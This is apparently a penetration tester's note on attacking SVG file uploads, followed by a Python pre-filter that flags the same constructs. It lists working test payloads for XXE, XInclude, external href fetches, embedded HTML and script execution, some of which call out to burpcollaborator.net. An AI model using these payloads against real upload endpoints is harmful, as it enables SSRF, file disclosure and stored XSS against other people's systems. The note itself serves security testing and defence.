File Upload Exploits

SVG

Beware that SVGs can be imported from many other formats!

Remember to include namespaces:

<svg width="255px" height="255px" xmlns="http://www.w3.org/2000/svg" xmlns:xi="http://www.w3.org/2001/XInclude"
  xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:xhtml="http://www.w3.org/1999/xhtml"  version="1.1">
</svg>

Testing guide

Check for XXE

Either a plain external entity declaration:

<!DOCTYPE svg [ <!ENTITY ext SYSTEM "http://burpcollaborator.net/"> ]>

or a parameter entity resolved from a data: URI:

<!DOCTYPE svg [
  <!ENTITY % init SYSTEM "data://text/plain;base64,aHR0cDovL2l4anBvYXo3YXZnZTVhN3g0ZmYxaTZ5anZhMTFwcS5idXJwY29sbGFib3JhdG9yLm5ldC8=">
%init; ]>

Check for XInclude attacks

<xi:include parse="text" href="http://burpcollaborator.net/"/>

Test whether the server will try to load xlinked hrefs:

<image href="http://burpcollaborator.net/" height="55" width="55"/>

If this works it might be of interest to check whether you could at least display some HTML:

<foreignObject x="20" y="20" width="160" height="160">
  <div xmlns="http://www.w3.org/1999/xhtml">
    Lorem ipsum dolor sit amet, consectetur adipiscing elit.
    Sed mollis mollis mi ut ultricies. Nullam magna ipsum,
    porta vel dui convallis, rutrum imperdiet eros. Aliquam
    erat volutpat.
  </div>
</foreignObject>

And other ways to display text:

<tref xlink:href="http://burpcollaborator.net/text.txt"/>

Test for JavaScript execution

<handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">
  var xhr = new XMLHttpRequest(); xhr.open("GET", "http://burpcollaborator.net/"); xhr.send();
</handler>
<circle cx="50" cy="50" r="45" fill="green" id="foo"
  onload="document.getElementById('foo').setAttribute('fill', 'blue');"/>

Attack surface

  • SSRF
  • XSS on behalf of the server (there may be better terminology for this)
  • XXE
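On the receiving side, every probe in the testing guide above maps to a construct an upload handler can refuse before the file reaches an image library. The following pre-filter is an added example and not part of the original note: a standard-library-only Python scanner that flags DOCTYPE/ENTITY declarations, XInclude, external `href`/`xlink:href` references, `foreignObject`, `script`, `handler` and `on*` event attributes. The sample documents and the `example.invalid` host are constructed placeholders.

```python
"""Pre-filter for uploaded SVGs: flag the constructs the testing guide above probes for.

Added example (not part of the original note). Standard library only; the sample
documents and the example.invalid host below are constructed placeholders.
"""
import re
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat
from typing import List

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
XINCLUDE_NS = "http://www.w3.org/2001/XInclude"

# Elements that pull in remote content, embed HTML, or run script.
RISKY_TAGS = {
    "{%s}foreignObject" % SVG_NS: "foreignObject embeds HTML",
    "{%s}script" % SVG_NS: "inline script",
    "{%s}handler" % SVG_NS: "SVG Tiny event handler",
    "{%s}include" % XINCLUDE_NS: "XInclude",
}
# Attribute names (Clark notation) that can reference an external resource.
HREF_ATTRS = {"href", "{%s}href" % XLINK_NS}
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")


class DtdFound(Exception):
    """Raised from the expat callback as soon as a DOCTYPE starts."""


def has_dtd(data: bytes) -> bool:
    """Detect a DOCTYPE with expat itself, so the check is encoding-aware
    (a byte regex for '<!DOCTYPE' would miss a UTF-16 document)."""
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdFound()  # stop before any entity declaration is processed

    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(data, True)
    except DtdFound:
        return True
    except expat.ExpatError:
        pass  # well-formedness is reported by the main parse below
    return False


def is_external(ref: str) -> bool:
    """True for absolute URIs (http:, data:, ...); fragments and relative paths are not."""
    ref = ref.strip()
    return not ref.startswith("#") and SCHEME_RE.match(ref) is not None


def scan_svg(data: bytes) -> List[str]:
    """Return a list of findings; an empty list means none of the probed constructs is present."""
    if has_dtd(data):
        # Refuse to parse further: a DTD is where XXE payloads live, and even an
        # internal subset can carry entity-expansion bombs.
        return ["DOCTYPE/ENTITY declaration present (possible XXE)"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return ["not well-formed XML: %s" % exc]

    findings = []
    for el in root.iter():
        local_tag = el.tag.split("}")[-1]
        if el.tag in RISKY_TAGS:
            findings.append("<%s>: %s" % (local_tag, RISKY_TAGS[el.tag]))
        for name, value in el.attrib.items():
            local_attr = name.split("}")[-1]
            if local_attr.lower().startswith("on"):
                findings.append("<%s %s>: event handler attribute" % (local_tag, local_attr))
            elif name in HREF_ATTRS and is_external(value):
                findings.append("<%s %s=%r>: external reference" % (local_tag, local_attr, value))
    return findings


# Constructed samples mirroring the probes in the testing guide (host is a placeholder).
SAMPLE_XXE = b'<!DOCTYPE svg [ <!ENTITY ext SYSTEM "http://example.invalid/"> ]><svg xmlns="http://www.w3.org/2000/svg"/>'
SAMPLE_XINCLUDE = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xi="http://www.w3.org/2001/XInclude">'
                   b'<xi:include parse="text" href="http://example.invalid/"/></svg>')
SAMPLE_IMAGE = b'<svg xmlns="http://www.w3.org/2000/svg"><image href="http://example.invalid/" height="55" width="55"/></svg>'
SAMPLE_FOREIGN = (b'<svg xmlns="http://www.w3.org/2000/svg"><foreignObject width="160" height="160">'
                  b'<div xmlns="http://www.w3.org/1999/xhtml">text</div></foreignObject></svg>')
SAMPLE_ONLOAD = (b'<svg xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="45" fill="green" id="foo" '
                 b'onload="document.getElementById(\'foo\').setAttribute(\'fill\', \'blue\');"/></svg>')
SAMPLE_CLEAN = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
                b'<defs><circle id="c" r="4"/></defs><use xlink:href="#c"/></svg>')

if __name__ == "__main__":
    for label, doc in [("xxe", SAMPLE_XXE), ("xinclude", SAMPLE_XINCLUDE), ("image", SAMPLE_IMAGE),
                       ("foreignObject", SAMPLE_FOREIGN), ("onload", SAMPLE_ONLOAD), ("clean", SAMPLE_CLEAN)]:
        print(label, scan_svg(doc) or "no findings")
```

The scanner rejects any DOCTYPE outright rather than trying to tell harmless declarations from harmful ones, and it only reports: a file with findings should be rejected, not cleaned in place, because the same parser differences that make the probes above work also defeat string-level sanitising. A stricter gate would allowlist the handful of elements and attributes the application actually needs instead of deny-listing the ones on this page.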

Resources

Blackhat old exploits for browsers
Fingerprinting libraries with blind SVG XLINK SSRF

Teodor-Paul Tonghioiu

Penetration Tester & Bug Hunter